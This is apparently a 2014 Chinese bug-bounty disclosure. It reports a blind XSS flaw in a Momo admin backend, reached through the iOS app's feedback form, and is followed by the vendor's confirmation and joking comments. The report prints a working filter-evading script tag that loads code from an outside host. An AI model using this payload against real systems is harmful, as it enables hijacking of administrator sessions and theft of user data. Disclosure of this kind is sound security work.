陌陌某管理功能后台存在XSS盲打漏洞

尼玛 ，搞得我蛋疼啊， 生气的 就就像反馈下 问题， 说怎么 越更新越垃圾了。。。也许得了病，现在看到id=就像加个 ' .... 看到留言框就像 加个 xss ....

IOS 版本的 ，安卓 的 没有测试 ， 问题反馈的地方 插入 XSS "><sCriPt SRc=http://xxoo.co/xxoo></ScrIpt> ，也没在意 ，但是 今天 闲的蛋疼 ，登录XSS 竟然看到 回信

来个VIP

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2014-07-14 18:04

厂商回复：

测试的后台，开发疏忽，修复中。

最新状态：

2014-08-06：修复

1. 2014-07-10 18:06 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

   0

   能进后台咩

   1# 回复此人

2. 2014-07-10 18:19 | 包包 ( 实习白帽子 | Rank:77 漏洞数:34 | 我是菜鸟，我怕谁？小弟新来，望大牛多多包...)

   0

   @xsser 剑心的回复好可爱啊

   2# 回复此人

3. 2014-07-10 18:40 | ylaxfcy ( 普通白帽子 | Rank:178 漏洞数:28 | 技术无黑白，但是人有)

   0

   能看聊天记录咩

   3# 回复此人

4. 2014-07-10 20:49 | Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | 乌云指定IDC)

   0

   能看聊天记录咩

   4# 回复此人

5. 2014-07-10 21:29 | roker ( 普通白帽子 | Rank:372 漏洞数:109 )

   0

   能看聊天记录咩

   5# 回复此人

6. 2014-07-10 21:41 | X,D ( 普通白帽子 | Rank:143 漏洞数:8 | X,D)

   0

   @xsser 1楼你这么萌你炮友知道么？

   6# 回复此人

7. 2014-07-11 06:53 | 7z1 ( 普通白帽子 | Rank:126 漏洞数:18 | 黑客：探险家、网络中的幽灵、用技术捍卫正...)

   0

   你是不是枫？

   7# 回复此人

8. 2014-07-11 08:57 | roker ( 普通白帽子 | Rank:372 漏洞数:109 )

   0

   @7z1 我是沙

   8# 回复此人

9. 2014-07-11 16:16 | Dot ( 路人 | Rank:9 漏洞数:3 | 我就佩服Ph牛！)

   0

   能看妹子素颜照片咩

   9# 回复此人

10. 2014-07-14 21:21 | 北京陌陌科技有限公司(乌云厂商)

    0

    @cooL 请私信我联系方式，或者加我陌陌1972097

    10# 回复此人

11. 2014-07-14 23:38 | Dot ( 路人 | Rank:9 漏洞数:3 | 我就佩服Ph牛！)

    1

    @北京陌陌科技有限公司 这是给派发妹子的节奏？

    11# 回复此人

12. 2014-08-06 12:20 | 小怿 ( 实习白帽子 | Rank:31 漏洞数:7 | )

    0

    @北京陌陌科技有限公司 这是给派发女神的节奏？

    12# 回复此人

13. 2014-08-06 13:30 | 小呆呆 ( 实习白帽子 | Rank:41 漏洞数:7 | 每次有人骂我猪我都说我偶像也是猪)

    1

    @北京陌陌科技有限公司 这是给派发女神的节奏？

    13# 回复此人

14. 2014-08-06 13:37 | 纠结师 ( 实习白帽子 | Rank:53 漏洞数:12 | 传说中的废材)

    0

    @北京陌陌科技有限公司 派我女神咩 系嘛？

    14# 回复此人

15. 2014-08-08 09:44 | 淘汰郎 ( 路人 | Rank:0 漏洞数:1 | lalala)

    0

    可以直接代理进后台？好想要这种平台

    15# 回复此人

16. 2014-08-12 11:33 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

    0

    明显是要送VIP

    16# 回复此人